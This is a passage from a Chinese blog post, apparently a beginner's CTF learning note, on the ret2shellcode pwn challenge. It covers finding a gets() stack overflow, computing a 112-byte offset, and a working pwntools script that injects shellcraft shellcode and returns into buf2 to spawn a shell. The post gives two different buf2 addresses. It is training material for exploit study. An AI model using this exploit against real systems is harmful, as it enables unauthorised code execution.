ret2shellcode学习笔记 -- PWN学习笔记

最新推荐文章于 2022-07-20 17:56:27 发布
最新推荐文章于 2022-07-20 17:56:27 发布
阅读量286 收藏 1
点赞数
分类专栏: PWN学习笔记 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117742895
版权

还是先IDA一下,看下反汇编的结果:

这里有gets()大概率会有栈溢出的情况,然后看左侧,没有vulnerable和get_shell,这是跟上一题最大的不同,但是先可以看看ebp等的动态执行情况:

跟上篇一样,输入八个A之后,出现

这里需要注意的一点,stack 24可能显示不出ebp那一行

所以stack 35 增大行数试试

可以看到eax存放的就是我们输入的gets(s)中的数据,而ebp就是我们所要溢出的位置

先借助python3 计算一下两者相差多少

可以发现两者相差108B,跟上题同样套路,还要加上4B的从ebp的再高一个位置的返回地址,即: 108+4 = 112B

所以总共要填充的是112B,但是这道题目中没有shellcode(个人理解是没有get_shell?)。所以要借助Python中的 

shellcraft.sh()
asm(shellcraft.sh())

而IDA中的那句: strncpy(buf2, &s, 0x64u);

是我们可以借助的,因为代码的功能是将s中的0x64u(也就是100B)复制到buf2中,所以我们可以将返回地址处填充上buf2的地址(这边没太明白┭┮﹏┭┮)

所以才有了:buf2 = 0x0804A0E4

buf2 = 0x0804A0E4
payload = asm(shellcraft.sh()).ljust(112,b'a')

其中ljust(112,b'a') 是python3的一个函数用来填充a至112B数据

from pwn import*
io = process('./ret2shellcode')
buf2 = 0x0804A080
payload = asm(shellcraft.sh()).ljust(112,b'a')
payload += p32(buf2)
io.sendline(payload)
io.interactive()

执行结果:

这样就相当于获得了shell

努力努力更努力NA
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn ret2shellcode
young‘s blog
02-08 1665
写在前面,记录一些小知识和一些文章 对于checksec后几个参数的具体研究: checksec及其包含的保护机制 (原博客图已经挂了,只能用简书的了) pwntools介绍(刚开始看不懂英文文档可以看这个): pwntools pwntools使用简介 文件执行时权限不够使用命令为: chmod +x start.sh 当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,...
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5278
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2384
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2885
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
ret2shellcode
weixin_56301399的博客
07-20 461
基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。
Ucos-2学习笔记
08-10
《Ucos-2学习笔记》 嵌入式系统开发中,使用操作系统是提升效率和应对复杂性的关键。本文主要探讨UCOS-II,一种适合小型系统的实时操作系统(RTOS)。UCOS-II以其轻量级、高效及源码开放的特点,广泛应用于各种嵌入式...
ret2-libc3-puts
最新发布
04-01
ret2-libc3-puts
【opencv学习笔记 24对象测量】
12-21
对象测量 弧长与面积 轮廓发现 多边形发现 approxPloyDP() 几何矩的计算 可以用来进行数字的边界查找,进行区域的... ret, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU) # 显示阈值
pwn07.ret2syscall例题
11-11
ret2syscall例题
Python实用库 PrettyTable 学习笔记
01-21
本文实例讲述了Python实用库 PrettyTable。分享给大家供大家参考,具体如下: PrettyTable安装 使用pip即可十分方便的安装PrettyTable,如下: pip install PrettyTable PrettyTable使用示例 ...
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1845
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
pwn学习任务(二)
weixin_44319142的博客
12-31 1415
PWN学习任务(二) Python字符串处理 zio库用法 pwntools库用法 学习使用socat开端口运行程序 掌握ida远程调试方法 pwn题目远程调试的运行 Python字符串处理 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + Shif...
pwn刷题num35----ret2shellcode
tbsqigongzi的博客
04-29 295
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
好好说话之ret2shellcode
hollk’s blog
06-22 1702
本题为ret2shellcode-example 题目路径 /ctf-challenges/pwn/stackoverflow/ret2shellcode/ret2shellcode-example 一、原理 ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shell...
horcruxes-pwnable
SkYe's Blog
10-04 717
前言 这题考的是ROP系统攻击。百度百科是这样介绍的: 简介:ROP全称为Return-oriented Programming(面向返回的编程)。是一种基于代码复用的攻击技术,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 内在特征:1. ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开...
pwn学习入门教程(一)
StevenOnesir的博客
11-24 2856
写这个系列的文章是因为想系统回顾之前学过的ctf知识,也希望引领更多人入门。 1. 对pwn的理解 pwn是ctf的一种题型,主要是利用程序中的漏洞造成内存破坏以获取远程计算机的shell,从而获得flag。对面服务器运行的更多是C/C++语言编写的程序,而我们通过网络与服务器进行数据交互,我们可以构造恶意数据发送给服务器,导致服务器执行恶意代码,从而远程控制服务器。 个人感觉逆向工程是pwn的基础,两者极其类似。学习pwn的门槛比web高很多,所以更需要长期的钻研与学习。 2、pwn入门学习的几点建议 首
i春秋-Linux pwn 入门
liminglei960316的博客
07-16 1189
一环境准备(64位)                     目标代码:与i春秋上有一点点区别,不同处标黄。                         #include <stdio.h>                             int hello()                                 {                  ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值